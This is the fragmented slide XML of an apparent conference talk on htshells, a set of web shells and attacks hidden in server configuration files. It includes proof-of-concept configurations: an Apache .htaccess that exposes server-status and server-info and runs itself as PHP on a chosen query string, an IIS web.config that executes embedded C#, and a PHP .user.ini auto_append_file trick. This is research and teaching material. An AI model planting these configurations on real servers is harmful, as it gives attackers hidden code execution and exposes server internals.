              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>svn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, .git, etc.) - except let's encrypt challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="76200" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RedirectMatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 403 ^/?\.(?!/well-known/acme-challenge/[\w-]{43}$)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562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090F0B-5D03-BB45-B355-7A33B8121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93" r="47451" b="69512"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="431443" y="1605787"/>
            <a:ext cx="8214203" cy="1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059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117B41-AE98-DE4E-BCC4-FEFDBF5F6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94" b="56752"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="176156" y="1187221"/>
            <a:ext cx="8760368" cy="284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120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BA78A5-3604-C748-8897-F4DBB1B7D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48" b="44242"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="474029" y="1026131"/>
            <a:ext cx="8250761" cy="333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29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Changes since release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7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EE7C8-E4F8-4441-AED0-796EACCD2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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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8704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5257036" cy="7131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 Apache syntax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Authorization syntax changed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 err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>AllowOverrideList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> allows granular restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1" dirty="0"/>
              <a:t>IF statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0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lang="en-AU" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRP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982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Htshells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A solution to a past problem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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>Super janky web shells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>”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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>Brilliantly nefarious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/wireghoul/htshells/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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8867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Not quite Turing complete</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="370" name="Shape 370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71" name="Shape 37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Shape 373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74" name="Shape 37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Shape 378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3973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699" y="1735600"/>
            <a:ext cx="585959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Dynamic directives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Use If statements to choose combinations of directives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Environment variables are available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Query string makes convenient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>PoC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98285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1673817" y="0"/>
            <a:ext cx="7470183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AU" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;If %{QUERY_STRING}="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>sutats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>SetHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t> server-status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>    Require all granted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;/If&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;If %{QUERY_STRING}="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ofni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>SetHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t> server-info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>    Require all granted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;/If&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;If %{QUERY_STRING}="phpsh23"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>    Require all granted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>SetHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t> application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>    # &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>(); exit; ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;/If&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12993914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5971F5-06AF-CF4E-A155-F55B53E92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65" y="0"/>
            <a:ext cx="79392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828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30ED6D-8CC8-3F4D-B56F-395B63835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159"/>
            <a:ext cx="9144000" cy="438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719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Updating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>htshells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8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EE7C8-E4F8-4441-AED0-796EACCD2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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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5908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Apache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Ensure attacks are syntax compatible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Add the ”Turing” configuration attacks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Other attacks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Push stealth limits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95317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IIS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AU" dirty="0"/>
              <a:t>Initial work by Soroush </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>Dalili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="19BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="19BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irsdl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>)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Additional attacks have been ported to IIS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IIS restricts per directory configuration options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Some attacks depend on server config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… or even registry values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19698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1673817" y="0"/>
            <a:ext cx="7470183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AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77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AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&lt;configuration&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>system.web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;&lt;compilation&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>buildProviders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>        &lt;add extension=".config" type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>System.Web.Compilation.PageBuildProvider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>"  /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>    &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>buildProviders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&lt;/compilation&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>system.web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>system.webServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>    &lt;handlers&gt;&lt;add name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t> test" path="*.config" verb="*" type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>System.Web.UI.PageHandlerFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>resourceType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>="Unspecified" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>preCondition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>integratedMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>" /&gt;&lt;/handlers&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>    &lt;security&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>        &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>requestFiltering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>            &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>fileExtensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;&lt;remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>fileExtension</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>=".config" /&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>fileExtensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>            &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>hiddenSegments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;&lt;remove segment="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>" /&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>hiddenSegments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t> &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>requestFiltering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;&lt;/security&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>system.webServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&gt;&lt;/configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&lt;!--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&lt;%@ Page Language="C#"%&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>&lt;% </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>Response.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>("-" + "-" + "&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>Response.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>("&lt;h"+"1&gt;Hello&lt;/h1&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>Response.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>("&lt;!" + "-" + "-");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1050" b="1" dirty="0">
                <a:latin typeface="American Typewriter" panose="02090604020004020304" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>--&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1050" b="1" dirty="0"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936728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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>user.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> is a PHP per directory configuration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Some directives allow code execution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Requires execution of a PHP file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Use full path to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>user.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> file, or breakage can happen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371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Run time configuration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7D1F8-78D5-2D4B-A139-328A61F96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48" y="5905095"/>
            <a:ext cx="38782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A46263-99EA-314C-8E3B-CB24BE2F6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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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1673817" y="0"/>
            <a:ext cx="7470183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AU" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>auto_append_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0"/>
              <a:t>=.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>user.ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
